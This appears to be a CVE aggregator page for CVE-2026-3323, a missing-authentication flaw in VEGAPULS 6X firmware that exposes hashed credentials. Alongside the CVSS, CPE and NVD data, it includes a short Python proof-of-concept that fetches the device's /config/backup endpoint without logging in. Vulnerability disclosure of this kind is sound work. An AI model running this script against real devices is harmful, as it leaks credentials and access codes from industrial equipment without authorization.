CVE-2026-3323

Description

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:vega:vegapuls_6x_firmware:1.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:vega:vegapuls_6x_firmware:1.1.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:vega:vegapuls_6x:-:*:*:*:*:*:*:* - NOT VULNERABLE

未知版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the unsecured configuration interface
target_url = "http://<target_ip>/config/backup"

try:
    # Send unauthenticated GET request
    response = requests.get(target_url, timeout=10)

    if response.status_code == 200:
        print("[+] Vulnerability confirmed! Sensitive data retrieved:")
        print(response.text)
    else:
        print(f"[-] Target responded with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3323
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3323
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3323/
[4] VulDB https://vuldb.com/cve/CVE-2026-3323
[5] https://certvde.com/en/advisories/VDE-2026-016
[6] https://vega.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-016.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3323", "sourceIdentifier": "[email protected]", "published": "2026-04-28T11:16:05.967", "lastModified": "2026-05-11T14:58:48.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vega:vegapuls_6x_firmware:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA4A5882-65D9-44A6-9A9B-2A0B1F644CA4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:vega:vegapuls_6x_firmware:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F505C3EA-1CD8-4219-9756-2E74D83EEA4A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vega:vegapuls_6x:-:*:*:*:*:*:*:*", "matchCriteriaId": "191D2BDC-D3D4-494B-9FFA-C808FAA3298F"}]}]}], "references": [{"url": "https://certvde.com/en/advisories/VDE-2026-016", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://vega.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2026-016.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}